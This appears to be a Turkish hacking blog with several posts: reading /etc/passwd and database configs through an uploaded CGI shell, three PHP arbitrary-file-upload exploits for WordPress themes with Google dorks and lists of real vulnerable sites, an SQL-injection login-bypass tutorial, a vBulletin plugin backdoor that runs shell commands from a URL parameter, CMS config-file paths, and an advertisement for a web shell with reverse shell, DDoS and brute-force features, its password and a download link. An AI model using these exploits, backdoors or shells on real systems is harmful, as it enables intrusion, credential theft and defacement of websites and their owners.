9 Kasım 2013 Cumartesi

C1 İle Domain Okuma - Listeleme - Config Ulaşma

Merhaba Arkadaşlar Öncelikle Bir Çok Kişinin Bildiği c1 İle Domain Okuma vb. İşlemlerin Size Nasıl Yapıldığını Göstericem.

Kurulum

-Öncelikle ekteki c1.tar.gz'yi sv'ye yüklüyoruz.
-Sonra Yüklediğimiz Dizindeki cgi shell'i Açıyoruz.
-Sonra komut Kısmına "tar zxvf c1.tar.gz" yazıyoruz.
-Ve kod işledikten sonra yüklediğiniz dizine "c1" adında klasör gelicek.
-Adres kısmına c1 yolunu yazıp giriyoruz. (Mesela anadizine kurduysanız siteismi.com/c1)
-Sonra 1 klasörüne girin dosyalar çıkcak
-Sonra İstiyen Passwd Okuyup Mesala (/home/traviantr/public_html) Yazarak Dosyalara Ulaşabilirler

Passwd Okumak İçin ;

C1/1/etc/passwd Kısmındaki Passwd Dosyasını Açmanız Yeterlidir

Domain Listeleme ;

C1/1/var/named Yada ;
C1/var/www/vhosts Bu Swden Swye Değişiyor

Config Çekmek DB Bağlanmak ;

(/home/traviantr/public_html/forum/) Mesala Buranın Forumunun DBSini Çekicek İlk Önce Config.php Dosyasını Okuyoruz Bu Scriptten Scripte Değişebilir.İnc/Config.php 'de Olabilir.Ondan Sonra Mysql Connect Shellimizden Sadrazam Shellde Üstte Ordan

DB Host:[Localhost] Genellikle Localhost Olur
DB Username: Database Kullanıcı Adı
DB Name: Database Kullanıcı Adının Şifresi
DB Password: Database İsmi

C1 Linki Aşağıdaki Ektedir.Yardımcı Olabildiysem Ne Mutlu Bana Smile


Ek Dosya-(lar)
.gz  c1.tar.gz (Dosya Boyutu: 260 Bayt / İndirme Sayısı: 12)

4 Kasım 2013 Pazartesi

Standart wordpress temalarından kaynaklı açıklar

Google arama dorklarını teker teker aratın sonra exploitler aracılığıyla shellinizi uplayabilirsiniz. Exploitleri php olarak kaydedin ve localhostta çalıştırın.
Kod:
###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress Area53 theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/area53-a-responsive-html5-wordpress-theme/2538737
# Affected Version: v1.0.1 - v1.0.5
# Price: $50
# Category: webapps/php
# Google dork: inurl:wp-content/themes/area53/
###################################################################################################
  
# Exploit
  
<?php
$uploadfile = "up.php";
$ch = curl_init(“http://site.com/wordpress/wp-content/themes/area53/framework/_scripts/valums_uploader/php.php”);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘qqfile’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
  
#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php
Kod:
###############################################################
# Exploit Title: WordPress Cold Fusion theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
# Google dork: inurl:wp-content/themes/ColdFusion/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://www.laughingcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-photo.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manuel-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
Kod:
###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Smail Max
# Date: 10/31/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/right-now-wp-full-video-image-with-audio/1575990
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
 
 
= = = = = = = =
1)Exploit     =
2)Real Demo   =
= = = = = = = =
 
1)Exploit :
= = = = = =
 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
 
# #### #### #### #### #### #### #### #### #
 
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php

SQL Injection nedir? Nasıl Yapılır

SQL Injection nedir? Nasıl Yapılır


Sql nedir?

"Structured Query Language" yani "Yapılandırılmış Sorgu Dili" anlamındadır. İlişkisel Veritabanı Yönetim Sistemleri (Relational Database Management System, RDBMS) veritabanlarında işlem yapabilmek için kullanılan bir yazılımdır. Sql bir dildir ancak bir proglama dili değildir. Programlama geliştirme aşamasında Sql’den yararlanılabilir; fakat tek başına Sql proglama için yeterli değildir. Sql ile bir veritabanından kayıtları alabilir, değiştirebilir, yeni kayıtlar ekleyebilir veya var olan kayıtları silebiliriz. Kısacası Sql, bir veritabanında veri saklamak ve istenilen vakitte ona ulaşmak için gerekli yoldur.

Şimdi konumuza giriş yapalım. Sql injection web uygulamalarındaki en ciddi açıklardan biri olarak görülebilir. Özellikle frameworkler ve Object Relational Mapping (ORM) gibi ekstra veritabanı katmanlarının popüler hale gelmesi ile bu tür açıklıklar azalsa da hala bulunmaktadır. Sql injection veritabanından ve dilden bağımsız olarak her türlü uygulama-veritabanı ilişkisine sahip bir sistemde bulunabilir, ki bu da veritabanlarının bir açığı değildir. Sql injectiondan korunmak web geliştiricisinin görevidir.

Sql injection Nedir?

Sql injection, Sql sorgularının arasına dışarıdan müdahalede bulunma, veri ekleme işleminin genel adıdır. Web uygulamalarında kullanıcılar tarafından girilen veriler ile dinamik Sql cümleleri oluşturulur. Bu cümleler oluşturulurken araya giren herhangi bir meta-karakter Sql injectionya neden olabilir. Meta-karakter; bir program için özel anlam ifade eden karakterlere verilen addır. Mesela JAVA'daki “\” bir meta-karakterdir ve derleyici ya da yorumlayıcı bu karakteri gördüğü vakit ondan sonra gelen karakteri bu meta-karaktere göre işler. Sql için ise meta-karakter " ‘ " (tek tırnak) ve " ; " (noktalı virgül) dür. Şimdi bir Sql injection nasıl yapılır onu görelim.

SQL injection Nasıl Yapılır?

Mesela bir foruma veya e-posta kutunuza giriş yapacaksınız. Kullanıcı adı ve şifrenizi girdiniz. Verileri girdikten sonra


Kod:
“SELECT * FROM UYELER WHERE kullanıcı_adi = ‘Baris’ AND sifre = ‘pamuk’ ”

şekline benzer bir Sql cümlesi oluşturulur. Eğer veritabanında böyle bir kayıt varsa Sql cümlesi o kaydı döndürür ve girişiniz sağlanır. Eğer kayıt yoksa tekrar giriş ana sayfasına yönlendirilirsiniz. Aşağıdaki örnek bir koda bakalım:


Kod:
Kullanici_adi = Request.Form(“username”)Sifre = Request.Form(“password”)Set RsLogin = SQLConn.Execute(“select * from Uyeler where username = ‘ “ & Kullanici_adi & ” ’ and password = ‘ “ & Sifre & ” ’ ”)İf RsLogin.EOF and RsLogin.BOF then Response.Redirect “/error.asp”else Oturum(“login”) = RsLogin(“kullanici_no”)Response.Redirect ”../”end if


Yukarıdaki örnek kod klasik bir oturum açma şeklidir. Bu örneğe basit bir sql injection deneyelim ve neler olabilir görelim. Öncelikle Kullanici_adi yerine “ ‘ or 1 = 1 ” , Sifre yerine ise “ ‘ or 1 = 1 ” girelim. Ve bakıyoruz ki siteye girmisiz. Aaa  Neden ve nasıl diye sormak çok doğal. Şimdi koda bakalım ve nasıl olduğunu hep beraber inceleyelim. Girdiğimiz değerleri kodda yerlerine koyarsak karşımıza şu şekilde bir kod çıkar.
·

Kod:
 Select * from Uyeler where username = ‘ ‘ or 4 = 4 ’ and password = ‘ ‘or 4 = 4 ’

Sizlerin de farkettiği gibi bu Sql cümlesi şu şekilde yorumlanacaktır. Uyeler tablosundan kullanici_adi alanı boş olanlar ve Sifre alanı boş olanları getir veya 4 eşittir 4 getir. Bu Sql cümlesi her zaman doğru dönecek ve Uyeler tablosundan tüm üyeleri listeleyecektir. Çünkü ilk kontrole bakmaksızın son kontrol(4 eşittir 4 kontrolü) her zaman doğru sonuç verecek ve Sql cümlesi çalışıp, Uyeler tablosundan tüm üyeler listelenecektir. Böylece dönen kayıtlardaki ilk kullanici olarak giriş yapmış bulunmaktasınız. Görüldüğü gibi Sql injection; Sql cümlelerinin arasına dışarıdan müdahale yapılmasına imkan sağlayıp Sql'i istediğiniz şekilde değiştirmenize izin verir.· Sql injection ın temel nedenlerinden birisi web uygulamalarının kullanıcılardan aldığı verileri kontrol etmeden, gerekli filtreleme işlemini yapmadan verileri direk alıp Sql cümlesi oluşturmasıdır. Bu açık yakalandığında müdahalede bulunmak için " ‘ " (tek tırnak) karakteri ile girdiye başlanır ve bunun sonucunda Sql’e istenilen komutu göndermek için tek tırnak yardımıyla string bölümünden kaçınılır. Bunun gibi veya daha farklı yollardan müdahalede bulunulursa istenmeyen kişiler tarafından ulaşılmasını istemediğimiz veriler ele geçirilebilir. Buna izin vermemek için yapmamız gereken iki ana kural vardır. 
• Tüm meta-karakterlerden kaçınılmalıdır.
•Sayısal olarak beklenen girdilerin sayısal olup olmadığı kontrol edilmelidir. 
Tek tırnak olayından kaçınmak için art arda iki kez tek tırnak işareti konulmalıdır, ki Sql bunun tek tırnak karakteri olduğunu anlasın. Bunun dışında ufak tefek yöntemler de vardır; ancak en genel yöntemler yukarıda listenenlerdir. 
Kolay Gelsin

Shelling vBulletin [All Version ]

Add a plugin. Make it for Ajax_complete and in the code area add :

Code:

if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; system($_GET['cmd']);exit;}

Activate the mod.

Code:

http://www.site.com/forumlocation/ajax.php?cmd=command

Exemple :

Code:

http://www.site.com/forumlocation/ajax.php?cmd=ls

Scriptlerin Config Yolları

php nuke -> . /config.php
vbulettin->. /includes/config.php
mybb -> . /inc/config.php
phpbb -> . /config.php
smf -> Settings.php
joomla -> configuration.php , configuration.php-dist
wordpress -> wp-config.php
seditio -> datas/config.php
drupal sistem:/home/user/public_html/sites/default/settings.php
setidio:/home/site/public_html/datas/config.php
vbulletin: /home/site/public_html/includes/config.php

Yorum: #1 | 
HeRoTurk Shell v1.2 404 Shell [ Special ] 
[Resim: f4h6lb2.png]


[Resim: d8f9p7.png]


Özellikler


Komut Satırı
Eval Kodları
Mysql Bağlantısı
Php Bilgisi
Backconnect
Dosya Yükleme
Shell Üzerinden Sahte Mail Atma
Sql Taraması
Port Taraması
Ddos ve Araçları
Metasploit Bağlantı
Reverse shell ( php ) Bağlantısı
Python Telnet
Symlink
Config Çekici
Komut Bypass (etc/passwd - netstat - etc/host vb..)
Cgi Telnet
Serverdeki Domainleri Listeleme
Joomla İndexer ( Admin Panel Yolu ve Symlink Kodunu Alttaki Boşluğada İndex Kodunuzu Yazarsanız Otomatik İndex Atar)
Vbulletin İndexer ( Yukarıdaki Özellikler)
Wordpress Şifre Değiştirici
Joomla Şifre Değiştirici
Whmcs Decoder
Zone-h Mass Poster
Mass Deface Script
Wordpress Brute Forcer
Joomla Brute Forcer
Cpanel Brute Forcer
Cloudflare Bypass
Admin Finder
Encrypt Olan Şifreyi Çözer (MD5 , MD4 , Salt , Vb...)
Base64 Decode - Encode
Whois Çekici
Joomla Server Tarayıcı
Cms Detector



Shell Şifresi : heroturk

HeRoTurk Shell V1



Özellikler
İstediğiniz Dizine Gitme
Upload Seçeneği
BackConnet
Dosya Düzenleme
İndirme Bölümü
Perm İzinleri

İndir:
http://s3.dosya.tc/server12/jFEJgT/v1.rar.html